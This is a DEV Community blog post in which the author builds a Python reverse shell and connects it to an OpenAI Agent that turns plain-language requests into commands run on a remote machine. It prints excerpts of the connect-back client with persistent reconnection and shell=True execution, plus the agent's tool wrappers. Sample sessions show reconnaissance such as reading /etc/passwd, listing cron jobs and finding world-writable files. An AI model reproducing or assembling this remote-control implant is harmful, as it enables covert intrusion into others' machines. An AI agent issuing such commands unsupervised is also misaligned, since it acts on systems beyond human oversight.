DEV Community

Cover image for Controlling a Reverse Shell Using OpenAI Agents: A Technical Deep Dive
paulsaul621
paulsaul621

Posted on

Controlling a Reverse Shell Using OpenAI Agents: A Technical Deep Dive

Demo

Introduction

This project explores the integration of a traditional reverse shell with an OpenAI-powered Agent. The goal: to issue natural language instructions and have them automatically translated into system-level commands that are executed on a remote machine.

You type:

"List all log files modified today." 
Enter fullscreen mode Exit fullscreen mode

The system:

Interprets your intent
Infers the operating system
Generates an appropriate shell command
Executes it remotely via a socket
Returns the output, all without manually touching the terminal
Enter fullscreen mode Exit fullscreen mode

In this post, I’ll walk through how I built this system without releasing the entire source code. Instead, I’ll explain the design decisions, the architecture, and include key code excerpts that show the core logic.

This is not a product or a public tool. It’s an educational deep dive for engineers, security professionals, and AI developers curious about what happens when you give an OpenAI Agent access to a shell.

1. Foundation: The Reverse Shell

The reverse shell was implemented in Python. The client script is designed to:

Initiate a TCP connection back to a server
Wait for shell commands over the socket
Execute received commands with subprocess.Popen
Return the combined stdout and stderr back to the server
Enter fullscreen mode Exit fullscreen mode

Key logic for command execution:

def execute_command(command):
    if command.startswith("cd "):
        try:
            os.chdir(command[3:].strip())
            return ""
        except Exception as e:
            return str(e)
    try:
        output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
        return output.decode(errors="ignore")
    except subprocess.CalledProcessError as e:
        return e.output.decode(errors="ignore") 
Enter fullscreen mode Exit fullscreen mode

The client loops persistently, reconnecting automatically if the server goes down or the connection drops:

while True:
    try:
        s.connect((HOST, PORT))
        # Handle command-receive-execute-return loop
    except socket.error:
        time.sleep(RETRY_DELAY) 
Enter fullscreen mode Exit fullscreen mode

2. The Server: Dispatcher + Agent Host

The server binds to a TCP port and accepts incoming connections from the client. Once connected, it wraps the socket interface into callable tools for the OpenAI Agent.

A core piece is the function that sends shell commands:

@function_tool
def execute_command(command: str) -> str:
    if connection:
        connection.sendall(command.encode())
        return connection.recv(4096).decode()
    return "No client connected." 
Enter fullscreen mode Exit fullscreen mode

For larger outputs, we use chunked reading:

def receive_chunks(sock):
    buffer = ""
    while True:
        data = sock.recv(4096).decode()
        if "<<EOT>>" in data:
            buffer += data.replace("<<EOT>>", "")
            break
        buffer += data
    return buffer.strip() 
Enter fullscreen mode Exit fullscreen mode

3. Agent Configuration

I used OpenAI's Agent interface with a structured instruction set:

agent = Agent(
    name="Shell Assistant",
    instructions="""
    You control a remote shell. Interpret user input as system administration requests.
    Detect the OS and use the correct shell syntax. Use execute_command for simple commands,
    and execute_command_with_chunking when long output is expected.
    """,
    tools=[execute_command, execute_command_with_chunking]
) 
Enter fullscreen mode Exit fullscreen mode

This gave the Agent flexibility to respond to vague requests like:

"Check available disk space" 
Enter fullscreen mode Exit fullscreen mode

With logic like:

if os_type == "linux":
    command = "df -h"
elif os_type == "windows":
    command = "wmic logicaldisk get size,freespace,caption" 
Enter fullscreen mode Exit fullscreen mode

4. Memory and Follow-Up Commands

I implemented a FIFO memory store (simple list buffer) that remembers the last N exchanges:

class ConversationMemory:
    def __init__(self, max_entries):
        self.history = []
        self.max_entries = max_entries

    def add(self, user_input, ai_response):
        self.history.append((user_input, ai_response))
        if len(self.history) > self.max_entries:
            self.history.pop(0) 
Enter fullscreen mode Exit fullscreen mode

This lets the Agent handle things like:

“Show me the second error in that list"
“Now delete the last log file you showed"
Enter fullscreen mode Exit fullscreen mode

Context matters when dealing with shell output.

5. Error Handling and Recovery

The client script wraps all networking and shell calls in try/except. If the socket dies or the command fails, the error is caught and returned as a string to the server:

try:
    result = execute_command(cmd)
    sock.send(result.encode())
except Exception as e:
    sock.send(f"[ERROR] {str(e)}".encode()) 
Enter fullscreen mode Exit fullscreen mode

On the server side, I wrap recv() in a timeout loop so that dropped clients don’t cause crashes.

6. OS-Aware Execution

The Agent detects the remote OS using probing commands:

# Initial check
os_check = execute_command("uname")
if "Linux" in os_check:
    os_type = "linux"
elif "Windows" in os_check or "Microsoft" in os_check:
    os_type = "windows" 
Enter fullscreen mode Exit fullscreen mode

The Agent then adapts syntax and tool selection to match.

Examples:

    "Show me open ports"
    "List services"
Enter fullscreen mode Exit fullscreen mode

7. Tool Design and Extension

The Agent interface made it easy to add new tools:

@function_tool
def list_large_files(path: str, size_mb: int) -> str:
    return execute_command(f"find {path} -type f -size +{size_mb}M") 
Enter fullscreen mode Exit fullscreen mode

I used this pattern for tools like:

system_info()
network_info()
read_file()
restart_service()
Enter fullscreen mode Exit fullscreen mode

Every tool is auditable and explicitly defined. The Agent never gets full shell access — only access to tool wrappers.

8. Sample Interactions

You: List all scheduled tasks and cron jobs
Agent:

crontab -l && cat /etc/crontab && ls -la /etc/cron.*
Enter fullscreen mode Exit fullscreen mode

Client:
[returns user and system-wide cron tasks]

You: Find all world-writable files in the root directory and subdirectories
Agent:

find / -type f -perm -o+w 2>/dev/null
Enter fullscreen mode Exit fullscreen mode

Client:
[returns paths to risky writable files]

You: Search for all .conf files modified in the last 3 days and show their first 10 lines
Agent:

find /etc -name '*.conf' -mtime -3 -exec head -n 10 {} +
Enter fullscreen mode Exit fullscreen mode

Client:
[returns headers from config files]

You: List all active outbound network connections
Agent:

ss -tunap | grep ESTAB
Enter fullscreen mode Exit fullscreen mode

Client:
[returns established connections with remote IPs and ports]

You: Show me all users with shell access and UID ≥ 1000
Agent:

awk -F: '($3>=1000)&&($7!~/nologin/){print $1}' /etc/passwd
Enter fullscreen mode Exit fullscreen mode

Client:
[returns usernames]

You: Identify any processes running from /tmp or without an executable path
Agent:

ps aux | grep '/tmp'
Enter fullscreen mode Exit fullscreen mode

Client:
[returns process list suspicious for temp-based execution]

9. Code Excerpts Only

I’m not publishing the full code. However, here’s the structure for the main loop inside the server:

while True:
    try:
        user_input = input("> ")
        agent.instructions = get_updated_instructions(memory)
        result = await Runner.run(agent, user_input)
        memory.add(user_input, result.final_output)
        print(result.final_output)
    except KeyboardInterrupt:
        break 
Enter fullscreen mode Exit fullscreen mode

And for the client execution loop:

while True:
    data = sock.recv(1024)
    if not data:
        break
    command = data.decode()
    output = execute_command(command)
    sock.send(output.encode()) 
Enter fullscreen mode Exit fullscreen mode

10. Final Thoughts

This project gave me a glimpse of what LLMs can do beyond chat and summarization: they can reason, infer intent, adapt to systems, and act as true automation layers.

I plan to open-source when I add new features to include, which includes a flask UI, I hope the ideas here inspire others working at the intersection of:

AI tooling
Red team automation
Remote ops
Natural language command execution
Enter fullscreen mode Exit fullscreen mode

Top comments (0)